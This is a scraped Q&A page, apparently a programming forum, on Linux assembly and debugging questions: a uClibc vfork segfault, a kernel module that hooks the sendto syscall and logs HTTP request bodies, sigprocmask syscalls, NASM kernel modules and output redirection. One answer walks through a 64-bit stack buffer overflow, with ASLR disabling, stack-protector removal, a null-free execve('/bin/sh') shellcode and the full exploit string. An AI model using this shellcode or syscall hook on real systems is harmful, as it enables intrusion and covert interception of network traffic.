uClibc vfork() is causing segmentation fault

uClibc vfork() is causing segmentation fault - linux

I am using armv7 for openwrt development and facing a segfault caused by vfork.
I have wrote a small test program with the following segments:
...
pid_t child_t;
if((child_t = vfork()) < 0)
{
printf("error!\n");
return -1;
}
else if(child_t == 0)
{
printf("in child:pid =%d\n",getpid());
sleep(2);
_exit(0);
}
else
{
printf("in parent:child_t id = %d,pid = %d\n",child_t,getpid());
}
...
The vfork() function always cause segfault, this is the gdb debug trace:
...
(gdb) c
Breakpoint 1, main (argc=1, argv=0xbefffed4) at handler.c:33
33 if((child_t = vfork()) < 0)
(gdb) stepi
0x00008474 in vfork () at libpthread/nptl/sysdeps/unix/sysv/linux/arm/../../../../../../../libc/sysdeps/linux/arm/vfo rk.S:71
71 SAVE_PID
(gdb) l
66
67 #else
68 __vfork:
69
70 #ifdef __NR_vfork
71 SAVE_PID
72 DO_CALL (vfork)
73 RESTORE_PID
74 cmn r0, #4096
75 IT(t, cc)
(gdb) b libpthread/nptl/sysdeps/unix/sysv/linux/arm/../../../../../../../libc/sysdeps/linux/arm/vfo rk.S:72
Breakpoint 2 at 0xb6fcf930: file libpthread/nptl/sysdeps/unix/sysv/linux/arm/../../../../../../../libc/sysdeps/linux/arm/vfo rk.S, line 72.
(gdb) disassemble
0x00008584 <+40>: bl 0x8444 <puts>
=> 0x00008588 <+44>: bl 0x8474 <vfork>
0x0000858c <+48>: str r0, [r11, #-12]
(gdb)stepi
...
(gdb) stepi
0x00008474 in vfork () at libpthread/nptl/sysdeps/unix/sysv/linux/arm/../../../../../../../libc/sysdeps/linux/arm/vfo rk.S:71
71 SAVE_PID
(gdb) disassemble
Dump of assembler code for function vfork:
=> 0x00008474 <+0>: add r12, pc, #0, 12
0x00008478 <+4>: add r12, r12, #8, 20 ; 0x8000
0x0000847c <+8>: ldr pc, [r12, #796]! ; 0x31c
(gdb) stepi
…
(gdb) disassemble
Dump of assembler code for function vfork:
0x00008474 <+0>: add r12, pc, #0, 12
0x00008478 <+4>: add r12, r12, #8, 20 ; 0x8000
=> 0x0000847c <+8>: ldr pc, [r12, #796]! ; 0x31c
(gdb)c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xffff0fe0 in ?? ()
(gdb)
I have also found the vfork code at vfork.S:
__vfork:
#ifdef __NR_vfork
SAVE_PID
DO_CALL (vfork)
RESTORE_PID
cmn r0, #4096
IT(t, cc)
#if defined(__USE_BX__)
bxcc lr
#else
movcc pc, lr
#endif
/* Check if vfork even exists. */
ldr r1, =-ENOSYS
teq r0, r1
bne __error
#endif
/* If we don't have vfork, use fork. */
DO_CALL (fork)
cmn r0, #4096
/* Syscall worked. Return to child/parent */
IT(t, cc)
#if defined(__USE_BX__)
bxcc lr
#else
movcc pc, lr
#endif
__error:
b __syscall_error
#endif
Some more information -
when bypassing vfork like this -
VFORK_LOCK;
- if ((pid = vfork()) == 0) { /* Child of vfork... */
+ // if ((pid = vfork()) == 0) { /* Child of vfork... */
+ pid = syscall(__NR_fork, NULL);
+ if (pid == 0) { /* Child of vfork... */
Everything seems to work fine.
Thank you all for your help!

man (3) vfork
The vfork() function shall be equivalent to fork(), except that the behavior is undefined if the process created by vfork() either modifies any data other than a variable of type pid_t used to store the return value from vfork(), or returns from the function in which vfork() was called, or calls any other function before successfully calling _exit() or one of the exec family of functions.
So in the child you can call _exit or exec. That's it.

The solution here was to enable CONFIG_KUSER_HELPER flag.
From CONFIG_USERS_HELPERS.
If all of the binaries and libraries which run on your platform
are built specifically for your platform, and make no use of
these helpers, then you can turn this option off to hinder
such exploits. However, in that case, if a binary or library
relying on those helpers is run, it will receive a SIGILL signal,
which will terminate the program.

Related

Why gdb backtrace syscall address is different from syscall table address

I'm really confusing with syscall address.
1 now I hook a syscall(fake_sendto) replace real syscall(sct[__NR_sendto]), and it workes normally.
# define fm_alert(fmt, ...) fm_printk(KERN_ALERT, fmt, ##__VA_ARGS__)
void
print_ascii(void *addr, size_t count, const char *prompt)
{
size_t index;
fm_alert("%s:\n", prompt);
for (index = 0; index < count; index += 1) {
pr_cont("%c", *((unsigned char *)addr + index));
}
return;
}
asmlinkage long
fake_sendto(int fd, void __user *buff, size_t len, unsigned flags,
struct sockaddr __user *addr, int addr_len)
{
void *kbuf = kmalloc(len + 1, GFP_KERNEL);
if (kbuf != NULL) {
if (copy_from_user(kbuf, buff, len)) {
fm_alert("%s\n", "copy_from_user failed.");
} else {
if (memcmp(kbuf, "GET", 3) == 0 ||
memcmp(kbuf, "POST", 4) == 0) {
print_ascii(kbuf, len, "ascii");
}
}
kfree(kbuf);
} else {
fm_alert("%s\n", "kmalloc failed.");
}
fm_alert("hook:%p, orig:%p\n", fake_sendto, real_sendto);
return real_sendto(fd, buff, len, flags, addr, addr_len);
}
now I dmesg to show logs:
[ 3466.057815] ifmonko.fake_sendto: hook:ffffffffc06d9070, orig:ffffffff8156b2c0
ok, I think the truely sys_sento address is above 0xffffffff8156b2c0
but when I write a test program, gdb print sendto function address is 0x7ffff7b11400 !
see below gdb debug info:
(gdb) disas main
Dump of assembler code for function main:
...
0x0000000000400cb4 <+743>: callq 0x400810 <sendto#plt>
...
End of assembler dump.
(gdb) b *0x0000000000400cb4
Breakpoint 1 at 0x400cb4: file ser.c, line 89.
(gdb) r
Starting program: /home/lid/ser 9898
Breakpoint 1, 0x0000000000400cb4 in main (argc=2, argv=0x7fffffffe6d8) at ser.c:89
89 nwrite = sendto(sfd, buf, strlen(buf), 0,
(gdb) c
Continuing.
Breakpoint 1, 0x0000000000400cb4 in main (argc=2, argv=0x7fffffffe6d8) at ser.c:89
89 nwrite = sendto(sfd, buf, strlen(buf), 0,
(gdb) p sendto
$1 = {<text variable, no debug info>} 0x7ffff7b11400 <sendto>
(gdb) si
0x0000000000400810 in sendto#plt ()
(gdb)
sendto () at ../sysdeps/unix/syscall-template.S:81
81 T_PSEUDO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
(gdb) bt
#0 sendto () at ../sysdeps/unix/syscall-template.S:81
#1 0x0000000000400cb9 in main (argc=2, argv=0x7fffffffe6d8) at ser.c:89
(gdb) disas
Dump of assembler code for function sendto:
=> 0x00007ffff7b11400 <+0>: cmpl $0x0,0x2c8b6d(%rip) # 0x7ffff7dd9f74 <__libc_multiple_threads>
0x00007ffff7b11407 <+7>: jne 0x7ffff7b1141c <sendto+28>
0x00007ffff7b11409 <+0>: mov %rcx,%r10
0x00007ffff7b1140c <+3>: mov $0x2c,%eax
0x00007ffff7b11411 <+8>: syscall
0x00007ffff7b11413 <+10>: cmp $0xfffffffffffff001,%rax
0x00007ffff7b11419 <+16>: jae 0x7ffff7b1144f <sendto+79>
0x00007ffff7b1141b <+18>: retq
0x00007ffff7b1141c <+28>: sub $0x8,%rsp
0x00007ffff7b11420 <+32>: callq 0x7ffff7b1df20 <__libc_enable_asynccancel>
0x00007ffff7b11425 <+37>: mov %rax,(%rsp)
0x00007ffff7b11429 <+41>: mov %rcx,%r10
0x00007ffff7b1142c <+44>: mov $0x2c,%eax
0x00007ffff7b11431 <+49>: syscall
0x00007ffff7b11433 <+51>: mov (%rsp),%rdi
0x00007ffff7b11437 <+55>: mov %rax,%rdx
0x00007ffff7b1143a <+58>: callq 0x7ffff7b1df80 <__libc_disable_asynccancel>
0x00007ffff7b1143f <+63>: mov %rdx,%rax
0x00007ffff7b11442 <+66>: add $0x8,%rsp
0x00007ffff7b11446 <+70>: cmp $0xfffffffffffff001,%rax
0x00007ffff7b1144c <+76>: jae 0x7ffff7b1144f <sendto+79>
0x00007ffff7b1144e <+78>: retq
0x00007ffff7b1144f <+79>: mov 0x2c2a12(%rip),%rcx # 0x7ffff7dd3e68
0x00007ffff7b11456 <+86>: neg %eax
0x00007ffff7b11458 <+88>: mov %eax,%fs:(%rcx)
---Type <return> to continue, or q <return> to quit---
0x00007ffff7b1145b <+91>: or $0xffffffffffffffff,%rax
0x00007ffff7b1145f <+95>: retq
End of assembler dump.
(gdb)
why does gdb show different from between hook function and syscall table ?

why does gdb show different from between hook function and syscall table ?
One is in the kernel space, and the other is in user space. They have approximately nothing to do with each other.

sigprocmask returns -22 in assembly

I would like to block all signals in a function using sigprocmask in assembly.
The following code works in C:
#include <stdio.h>
#include <signal.h>
int main() {
sigset_t n={(unsigned long int) 0xffffffff};
sigprocmask (SIG_BLOCK, &n, 0);
for (int i=0; i<0x8ffff; i++) printf(".");
}
When the code executes and starts printing dots on the terminal, I cannot interrupt it with Ctrl+C. So far so good.
The value of SIG_BLOCK is 0, apparently; and the syscall number for sys_rt_sigprocmask is 14:
http://blog.rchapman.org/post/36801038863/linux-system-call-table-for-x86-64
So I write:
[BITS 64]
[section .text align=1]
global main
main:
mov r10, 32
mov rdx, 0
mov rsi, newmask
mov rdi, 0
mov rax, 14
syscall
dotPrintLoop:
mov rdi, dotstring
mov rax, 0
syscall
jmp dotPrintLoop
[section .data align=1]
dotstring: db ".",0
newmask: dd 0xffffffff
dd 0xffffffff
dd 0xffffffff
...
And it does not work. gdb reveals that rax has the value -22 (EINVAL - "invalid parameter") after the first syscall; whereas the second syscall (of sys_write) works just fine.
What am I doing wrong?

Apparently r10 should hold the value 8 instead of 32.
I encountered 4 different definitions of sigset_t within the kernel code; and for each of them the sizeof() function returns a different result (32, 128, 4 and 8 as I recall). Only the final one is relevant to the syscall.
The kernel first checks that $r10 == sizeof(sigset_t); and returns EINVAL (-22) if that does not hold. The value of sizeof(sigset_t) is equal to 8 for both 32-bit and 64-bit versions.

Buffer overflows on 64 bit

I am trying to do some experiments with buffer overflows for fun. I was reading on this forum on the topic, and tried to write my own little code.
So what I did is a small "C" program, which takes character argument and runs until segmentation fault.
So I supply arguments until I get a message that I overwrote the return address with "A" which is 41. My buffer character length, in which I copy my input strings is [5].
Here is what I did in gdb.
run $(perl -e 'print "A"x32 ; ')
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400516 in main (argc=Cannot access memory at address 0x414141414141412d
Then I figured out that it takes 16 'A' to overwrite.
run $(perl -e 'print "A"x16 . "C"x8 . "B"x32 ; ')
0x0000000000400516 in main (argc=Cannot access memory at address 0x434343434343432f
)
Which tells us that the 8 "C" are overwriting the return address.
According to the online tutorials if I supply a valid adress instead of the 8 "C". I can jump to some place and execute code. So I overloaded the memory after the initial 16 "A".
The next step was to execute
run $(perl -e 'print "A"x16 . "C"x8 . "B"x200 ; ')
rax 0x0 0
rbx 0x3a0001bbc0 249108216768
rcx 0x3a00552780 249113683840
rdx 0x3a00553980 249113688448
rsi 0x42 66
rdi 0x2af9e57710e0 47252785008864
rbp 0x4343434343434343 0x4343434343434343
rsp 0x7fffb261a2e8 0x7fffb261a2e8
r8 0xffffffff 4294967295
r9 0x0 0
r10 0x22 34
r11 0xffffffff 4294967295
r12 0x0 0
r13 0x7fffb261a3c0 140736186131392
r14 0x0 0
r15 0x0 0
rip 0x400516 0x400516 <main+62>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
mxcsr 0x1f80 [ IM DM ZM OM UM PM ]
After examining the memory 200 bytes after $rsp i found an address and I did the following:
run $(perl -e 'print "A"x16 . "\x38\xd0\xcb\x9b\xff\x7f" . "\x90"x50 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" ; ')
This however does not do anything. I would be grateful if someone can give me an idea what am I doing wrong.

First make sure that you change the randomize_va_space. On Ubuntu you would run the following as root
echo 0 > /proc/sys/kernel/randomize_va_space
Next make sure you are compiling the test program without stack smashing protection and set the memory execution bit. Compile it with the following gcc options to accomplish
-fno-stack-protector -z execstack
Also I found I needed more space to actually execute a shell so I would change your buffer to something more like buffer[64]
Next you can run the app in gdb and get the stack address you need to return to
First set a breakpoint right after the strcpy
(gdb) disassemble main
Dump of assembler code for function main:
0x000000000040057c <+0>: push %rbp
0x000000000040057d <+1>: mov %rsp,%rbp
0x0000000000400580 <+4>: sub $0x50,%rsp
0x0000000000400584 <+8>: mov %edi,-0x44(%rbp)
0x0000000000400587 <+11>: mov %rsi,-0x50(%rbp)
0x000000000040058b <+15>: mov -0x50(%rbp),%rax
0x000000000040058f <+19>: add $0x8,%rax
0x0000000000400593 <+23>: mov (%rax),%rdx
0x0000000000400596 <+26>: lea -0x40(%rbp),%rax
0x000000000040059a <+30>: mov %rdx,%rsi
0x000000000040059d <+33>: mov %rax,%rdi
0x00000000004005a0 <+36>: callq 0x400450 <strcpy#plt>
0x0000000000**4005a5** <+41>: lea -0x40(%rbp),%rax
0x00000000004005a9 <+45>: mov %rax,%rsi
0x00000000004005ac <+48>: mov $0x400674,%edi
0x00000000004005b1 <+53>: mov $0x0,%eax
0x00000000004005b6 <+58>: callq 0x400460 <printf#plt>
0x00000000004005bb <+63>: mov $0x0,%eax
0x00000000004005c0 <+68>: leaveq
0x00000000004005c1 <+69>: retq
End of assembler dump.
(gdb) b *0x4005a5
Breakpoint 1 at 0x4005a5
Then run the app and at the break point grab the rax register address.
(gdb) run `python -c 'print "A"*128';`
Starting program: APPPATH/APPNAME `python -c 'print "A"*128';`
Breakpoint 1, 0x00000000004005a5 in main ()
(gdb) info register
rax 0x7fffffffe030 140737488347136
rbx 0x0 0
rcx 0x4141414141414141 4702111234474983745
rdx 0x41 65
rsi 0x7fffffffe490 140737488348304
rdi 0x7fffffffe077 140737488347255
rbp 0x7fffffffe040 0x7fffffffe040
rsp 0x7fffffffdff0 0x7fffffffdff0
r8 0x7ffff7dd4e80 140737351863936
r9 0x7ffff7de9d60 140737351949664
r10 0x7fffffffdd90 140737488346512
r11 0x7ffff7b8fd60 140737349483872
r12 0x400490 4195472
r13 0x7fffffffe120 140737488347424
r14 0x0 0
r15 0x0 0
rip 0x4005a5 0x4005a5 <main+41>
eflags 0x206 [ PF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb)
Next determine your max buffer size. I know that the buffer of 64 crashes at 72 bytes so I will just go from that.. You could use something like metasploits pattern methods to give you this or just figure it out from trial and error running the app to find out the exact byte count it takes before getting a segfault or make up a pattern of your own and match the rip address like you would with the metasploit pattern option.
Next, there are many different ways to get the payload you need but since we are running a 64bit app, we will use a 64bit payload. I compiled C and then grabbed the ASM from gdb and then made some changes to remove the \x00 chars by changing the mov instructions to xor for the null values and then shl and shr to remove them from the shell command. We will show this later but for now the payload is as follows.
\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05
our payload here is 48 bytes so we have 72 - 48 = 24
We can pad the payload with \x90 (nop) so that instruction will not be interrupted. Ill add 2 at the end of the payload and 22 at the beginning. Also I will tack on the return address that we want to the end in reverse giving the following..
`python -c 'print "\x90"*22+"\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05\x90\x90\x30\xe0\xff\xff\xff\x7f"';`
Now if you want to run it outside of gdb, you may have to fudge with the return address. In my case the address becomes \x70\xe0\xff\xff\xff\x7f outside of gdb. I just increased it until it worked by going to 40 then 50 then 60 then 70..
test app source
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char name[64];
strcpy(name, argv[1]);
printf("Arg[1] is :%s\n", name);
return 0;
}
This is the payload in C
#include <stdlib.h>
int main()
{
execve("/bin/sh", NULL, NULL);
}
And payload in ASM which will build and run
int main() {
__asm__(
"mov $0x0,%rdx\n\t" // arg 3 = NULL
"mov $0x0,%rsi\n\t" // arg 2 = NULL
"mov $0x0068732f6e69622f,%rdi\n\t"
"push %rdi\n\t" // push "/bin/sh" onto stack
"mov %rsp,%rdi\n\t" // arg 1 = stack pointer = start of /bin/sh
"mov $0x3b,%rax\n\t" // syscall number = 59
"syscall\n\t"
);
}
And since we can't use \x00 we can change to xor the values and do some fancy shifting to remove the bad values of the mov for setting up /bin/sh
int main() {
__asm__(
"xor %rdx,%rdx\n\t" // arg 3 = NULL
"mov %rdx,%rsi\n\t" // arg 2 = NULL
"mov $0x1168732f6e69622f,%rdi\n\t"
"shl $0x8,%rdi\n\t"
"shr $0x8,%rdi\n\t" // first byte = 0 (8 bits)
"push %rdi\n\t" // push "/bin/sh" onto stack
"mov %rsp,%rdi\n\t" // arg 1 = stack ptr = start of /bin/sh
"mov $0x111111111111113b,%rax\n\t" // syscall number = 59
"shl $0x38,%rax\n\t"
"shr $0x38,%rax\n\t" // first 7 bytes = 0 (56 bits)
"syscall\n\t"
);
}
if you compile that payload, run it under gdb you can get the byte values you need such as
(gdb) x/bx main+4
0x400478 <main+4>: 0x48
(gdb)
0x400479 <main+5>: 0x31
(gdb)
0x40047a <main+6>: 0xd2
(gdb)
or get it all by doing something like
(gdb) x/48bx main+4
0x4004f0 <main+4>: 0x48 0x31 0xd2 0x48 0x89 0xd6 0x48 0xbf
0x4004f8 <main+12>: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x11
0x400500 <main+20>: 0x48 0xc1 0xe7 0x08 0x48 0xc1 0xef 0x08
0x400508 <main+28>: 0x57 0x48 0x89 0xe7 0x48 0xb8 0x3b 0x11
0x400510 <main+36>: 0x11 0x11 0x11 0x11 0x11 0x11 0x48 0xc1
0x400518 <main+44>: 0xe0 0x38 0x48 0xc1 0xe8 0x38 0x0f 0x05

Well for starters... Are you entirely sure that the address on the stack is the return pointer and not a pointer to say a data structure or string somewhere? If that is the case it will use that address instead of the string and could just end up doing nothing :)
So check if your function uses local variables as these are put on the stack after the return address. Hope this helps ^_^ And good luck!

i haven't worked with x64 much , but a quick look says you have 16 bytes till rip overwrite.
instead of the \x90 try \xCC's to see if controlled code redirection has occured, if it has gdb should hit(land in the \xCC pool) the \xCC and pause (\xCC are in a way 'hardcoded' breakpoints).

memory access when writing a linux kernel module in assembler

i try writing a kernel module in assembler. In one time i needed a global vars. I define a dword in .data (or .bss) section, and in init function i try add 1 to var. My program seccesfully make, but insmod sey me:
$ sudo insmod ./test.ko
insmod: ERROR: could not insert module ./test.ko: Invalid module format
it's my assembler code in nasm:
[bits 64]
global init
global cleanup
extern printk
section .data
init_mess db "Hello!", 10, 0
g_var dd 0
section .text
init:
push rbp
mov rbp, rsp
inc dword [g_var]
mov rdi, init_mess
xor rax, rax
call printk
xor rax, rax
mov rsp, rbp
pop rbp
ret
cleanup:
xor rax, rax
ret
if i write adding in C code, all work good:
static i = 0;
static int __init main_init(void) { i++; return init(); }
But in this objdump -d test.ko write a very stainght code for me:
0000000000000000 <init_module>:
0: 55 push %rbp
1: ff 05 00 00 00 00 incl 0x0(%rip) # 7 <init_module+0x7>
7: 48 89 e5 mov %rsp,%rbp
a: e8 00 00 00 00 callq f <init_module+0xf>
f: 5d pop %rbp
10: c3 retq
What does this mean (incl 0x0(%rip))? How can I access memory? Please, help me :)
(My system is archlinux x86_64)
my C code for correct make a module:
#include <linux/module.h>
#include <linux/init.h>
MODULE_AUTHOR("Actics");
MODULE_DESCRIPTION("Description");
MODULE_LICENSE("GPL");
extern int init(void);
extern int cleanup(void);
static int __init main_init(void) { return init(); }
static void __exit main_cleanup(void) { cleanup(); }
module_init(main_init);
module_exit(main_cleanup);
and my Makefile:
obj-m := test.o
test-objs := inthan.o module.o
KVERSION = $(shell uname -r)
inthan.o: inthan.asm
nasm -f elf64 -o $# $^
build:
make -C /lib/modules/$(KVERSION)/build M=$(PWD) modules

Kernel mode lives in the "negative" (ie. top) part of the address space, where 32 bit absolute addresses can not be used (because they are not sign-extended). As you have noticed, gcc uses rip-relative addresses to work around this problem which gives offsets from the current instruction pointer. You can make nasm do the same by using the DEFAULT REL directive. See the relevant section in the nasm documentation.

you can always use inline assembly
asm("add %3,%1 ; sbb %0,%0 ; cmp %1,%4 ; sbb $0,%0" \
54 : "=&r" (flag), "=r" (roksum) \
55 : "1" (addr), "g" ((long)(size)), \
56 "rm" (limit));

redirecting result of running assembly code in linux to text file [duplicate]

This question already has answers here:
Using printf in assembly leads to empty output when piping, but works on the terminal
(2 answers)
Can ptrace tell if an x86 system call used the 64-bit or 32-bit ABI?
(1 answer)
What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code?
(1 answer)
Closed 2 years ago.
I'm trying to write a Python script to test the output of some various code I've written in assembly against an expected output. However I am having difficulty redirecting the output into a file.
I have written the following:
extern printf
LINUX equ 80H ; interupt number for entering Linux kernel
EXIT equ 1 ; Linux system call 1 i.e. exit ()
section .data
intfmt: db "%ld", 10, 0
segment .text
global main
main:
push rax
push rsi
push rdi
mov rsi, 10
mov rdi, intfmt
xor rax, rax
call printf
pop rdi
pop rsi
pop rax
call os_return ; return to operating system
os_return:
mov rax, EXIT ; Linux system call 1 i.e. exit ()
mov rbx, 0 ; Error code 0 i.e. no errors
mov rcx, 5
int LINUX ; Interrupt Linux kernel
I then procede to do the following in the console:
nasm -f elf64 basic.asm
gcc -m64 -o basic basic.o
./basic
Which outputs 10 to the screen.
However if I enter
./basic > basic.txt
cat basic.txt
basic.txt appears as an empty file.
My overall goal is to write a shell script that loops over each assembly file to compiling and run the file and then redirect the output of this script into a file. However I cannot do this until I can get it to work with a single file.
I was wondering it it was something to do with my call to printf? Although I was under the illusion that printf writes to STDOUT.
Thanks in advance!

Your redirection is correct; the problem must be in the assembly you are generating.
The tool to debug such problems is strace. Running your program under strace, shows:
strace ./basic
...
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa5bb8da000
write(1, "10\n", 3) = 3
10
write(1, "z\377n\f\377\177\0\0\0\0\0\0\0\0\0\0\202\377n\f\377\177\0\0\362\377n\f\377\177\0\0"..., 139905561665008 <unfinished ... exit status 0>
You can clearly see your desired output, but also some "stray" write. Where is that write coming from?
GDB to the rescue:
gdb -q ./basic
Reading symbols from /tmp/basic...done.
(gdb) catch syscall write
Catchpoint 1 (syscall 'write' [1])
(gdb) r
Catchpoint 1 (call to syscall 'write'), 0x00007ffff7b32500 in __write_nocancel ()
(gdb) bt
#0 0x00007ffff7b32500 in __write_nocancel () at ../sysdeps/unix/syscall-template.S:82
#1 0x00007ffff7acd133 in _IO_new_file_write (f=0x7ffff7dd7780, data=0x7ffff7ff8000, n=3) at fileops.c:1276
#2 0x00007ffff7ace785 in new_do_write (fp=0x7ffff7dd7780, data=0x7ffff7ff8000 "10\n", to_do=3) at fileops.c:530
#3 _IO_new_do_write (fp=0x7ffff7dd7780, data=0x7ffff7ff8000 "10\n", to_do=3) at fileops.c:503
#4 0x00007ffff7accd9e in _IO_new_file_xsputn (f=0x7ffff7dd7780, data=0x601023, n=1) at fileops.c:1358
#5 0x00007ffff7a9f9c8 in _IO_vfprintf_internal (s=0x7ffff7dd7780, format=<value optimized out>, ap=0x7fffffffda20) at vfprintf.c:1644
#6 0x00007ffff7aaa53a in __printf (format=0x7ffff7ff8000 "10\n") at printf.c:35
#7 0x000000000040054f in main ()
Good, this is the expected call to write.
(gdb) c
10
Catchpoint 1 (returned from syscall 'write'), 0x00007ffff7b32500 in __write_nocancel () at ../sysdeps/unix/syscall-template.S:82
82 in ../sysdeps/unix/syscall-template.S
This is just the return from syscall. Did write succeed? (We know it did, since we see its output above, but let's confirm.)
(gdb) p $rax
$1 = 3
Good. Write wrote the expected 3 characters.
(gdb) c
Catchpoint 1 (call to syscall 'write'), 0x0000000000400577 in os_return ()
This is the write we didn't expect. Where from?
(gdb) bt
#0 0x0000000000400577 in os_return ()
#1 0x0000000000400557 in main ()
(gdb) disas
Dump of assembler code for function os_return:
0x0000000000400557 <+0>: movabs $0x1,%rax
0x0000000000400561 <+10>: movabs $0x0,%rbx
0x000000000040056b <+20>: movabs $0x5,%rcx
0x0000000000400575 <+30>: int $0x80
=> 0x0000000000400577 <+32>: nop
0x0000000000400578 <+33>: nop
0x0000000000400579 <+34>: nop
0x000000000040057a <+35>: nop
0x000000000040057b <+36>: nop
0x000000000040057c <+37>: nop
0x000000000040057d <+38>: nop
0x000000000040057e <+39>: nop
0x000000000040057f <+40>: nop
End of assembler dump.
(gdb) quit
So your syscall executed write(2) instead of expected exit(2). Why did this happen?
Because you've defined EXIT incorrectly:
grep 'define .*NR_exit' /usr/include/asm/unistd*.h
/usr/include/asm/unistd_32.h:#define __NR_exit 1
/usr/include/asm/unistd_32.h:#define __NR_exit_group 252
/usr/include/asm/unistd_64.h:#define __NR_exit 60
/usr/include/asm/unistd_64.h:#define __NR_exit_group 231
From above, you can tell that EXIT should be 1 in 32-bit mode, but 60 in 64-bit mode.
What about NR_write? Is it 1 in 64-bit mode?
grep 'define .*NR_write' /usr/include/asm/unistd_64.h
#define __NR_write 1
#define __NR_writev 20
Indeed it is. So we have solved the "where did stray write come from?" puzzle. Fixing EXIT to be 60, and rerunning under strace, we now see:
...
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa5bb8da000
write(1, "10\n", 3) = 3
10
_exit(1) = ?
That still isn't right. We should be calling _exit(0), not _exit(1). A look at the x86_64 ABI, reveals that your register use is incorrect: syscall number should be in %rax, but the arguments in %rdi, %rsi, %rdx, etc.
Fixing that (and deleting bogus mov rcx, 5), we finally get desired output from strace:
...
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa5bb8da000
write(1, "10\n", 3) = 3
10
_exit(0) = ?
So now we are ready to see if above fixes also fixed the redirection problem.
Re-running under strace, with output redirected:
strace ./basic > t
...
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f08161eb000
_exit(0) = ?
Clearly our call to write is missing. Where did it go?
Well, stdout output is line buffered by default, and gets fully buffered when redirected to a file. Perhaps we are missing an fflush call?
Indeed, adding a call to fflush(NULL) just before exiting solves the problem:
...
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f8afd450000
write(1, "10\n", 3) = 3
_exit(0) = ?
I hope you've learned something today (I did ;-)

Try exiting from main by
mov rax, 0; exit code
ret

Develop Reference

node.js excel linux python-3.x azure haskell apache-spark rust .htaccess string